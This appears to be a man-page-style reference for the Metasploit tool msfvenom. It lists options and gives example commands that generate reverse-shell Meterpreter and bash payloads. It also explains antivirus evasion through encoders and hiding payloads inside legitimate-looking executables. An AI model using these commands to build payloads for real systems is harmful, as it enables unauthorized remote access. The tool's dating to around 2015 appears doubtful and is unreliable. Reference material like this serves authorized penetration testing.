msfvenom

List payloads

$ msfvenom [[-l|--list]] payloads

$ msfvenom [[-l|--list]] formats

$ msfvenom [[-p|--payload]] [payload] --list-options

$ msfvenom [[-p|--payload]] linux/x64/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] [[-f|--format]] elf [[-o|--out]] [path/to/binary]

$ msfvenom [[-p|--payload]] windows/x64/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] [[-f|--format]] exe [[-o|--out]] [path/to/binary.exe]

$ msfvenom [[-p|--payload]] cmd/unix/reverse_bash LHOST=[local_ip] LPORT=[local_port] [[-f|--format]] raw

msfvenom -p <payload> [options] -f <format> -o <output_file>
msfvenom [options]

-p, --payload <payload>
    Specify the payload to use. This is often the first and most critical option to define the malicious behavior.

-l, --list <type>
    List available modules of a specific type. Common types include payloads, encoders, nops, or all to list everything.

-f, --format <format>
    Specify the output format for the generated payload. Examples include exe (Windows executable), elf (Linux executable), raw (raw shellcode), sh (shell script), asp, war, apk, etc.

-e, --encoder <encoder>
    Specify the encoder to use to obfuscate the payload. Encoders help in evading basic antivirus detection. Examples include x86/shikata_ga_nai.

-a, --arch <architecture>
    Specify the target architecture for the payload (e.g., x86, x64, armle, mips). This must match the target system's architecture.

-o, --output <file>
    Save the generated payload to the specified output file.

-b, --bad-chars <chars>
    Specify characters to avoid in the generated payload, often used to prevent breaking exploit stability due to specific character limitations (e.g., '\x00\x0a\x0d' for null, newline, carriage return).

-i, --iterations <count>
    The number of times to encode the payload. Multiple iterations can further obfuscate the payload, but also increase its size and potentially reduce stability.

-x, --template <path>
    Specify a custom executable template to embed the payload into. This allows embedding the malicious payload within a legitimate-looking application.

-k, --keep
    When used with --template, this option preserves the template's original functionality, making the resulting executable appear normal while secretly executing the payload.

-s, --space <size>
    The maximum size of the generated payload in bytes. Useful for fitting payloads into limited buffer spaces during exploitation.

-n, --nopsled <count>
    Prepend a NOP sled of count size to the payload. NOP sleds increase the chances of hitting the payload during exploitation by providing a buffer of 'no operation' instructions.

-v, --var-name <name>
    Specify a custom variable name for certain output formats (e.g., C, Perl, Ruby shellcode arrays) where the payload is stored as a variable.

--platform <platform>
    Specify the target platform for the payload (e.g., windows, linux, osx, android). This helps in filtering relevant payloads and encoders.

--smallest
    Generate the smallest possible payload. This often implies using a non-staged payload and minimal encoding to reduce byte count.

--raw
    Output raw payload bytes, useful when the payload needs to be integrated into custom exploit code or buffer overflows.

--help
    Display the help message and exit.

--version
    Show the msfvenom version information and exit.

msfvenom is a powerful command-line utility that is an integral part of the Metasploit Framework, widely used by penetration testers and security researchers. It serves as a standalone payload generator and encoder, consolidating the functionalities of msfpayload and msfencode into a single, more efficient tool.

Its primary purpose is to create various types of malicious payloads, ranging from simple shellcode to complex executables, web scripts, and mobile application payloads, targeting a multitude of operating systems and architectures (e.g., Windows, Linux, macOS, Android, iOS, x86, x64, ARM). msfvenom allows users to specify the payload, encoder, number of iterations, and output format. The encoding capabilities are crucial for evading signature-based antivirus detection, though advanced AV/EDR solutions can often detect msfvenom-generated payloads. It's an essential tool for crafting custom implants during red team operations and vulnerability exploitation.

Generated payloads from msfvenom, especially with common encoders, are frequently detected by modern antivirus (AV) and Endpoint Detection and Response (EDR) solutions. Advanced obfuscation techniques or custom shellcode may be required for evasion.

Usage of msfvenom requires a deep understanding of security principles and should only be performed with explicit legal authorization and ethical considerations. Misuse can lead to severe legal consequences.

Many payloads generated by msfvenom require specific configuration options to function correctly. These options are typically appended directly after the payload name using the KEY=VALUE format.

Common options include:
LHOST: The local host or attacker's IP address where the listener will be set up.
LPORT: The local port on which the listener will operate.
RHOST: The remote host or target's IP address (for bind payloads or exploits).
RPORT: The remote port on the target (for bind payloads or specific exploits).

For example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

These options are crucial for defining the payload's behavior, especially for reverse shell connections or stage configurations.

msfvenom was introduced as a significant improvement within the Metasploit Framework, debuting around 2015 with Metasploit Framework version 4.10. Its creation was driven by the need to consolidate and streamline the payload generation process. Prior to msfvenom, users had to employ two separate command-line tools: msfpayload to generate the raw payload and then msfencode to obfuscate and format it. This often involved piping the output of one command to the input of another, which could be cumbersome and prone to errors.

msfvenom effectively merged the functionalities of both msfpayload and msfencode into a single, more efficient, and user-friendly command. This integration simplified the workflow for penetration testers, reduced overhead, and provided a more robust and unified interface for crafting custom payloads, quickly making it an indispensable tool in the security community.

msfconsole(1), meterpreter(1), nmap(1), netcat(1)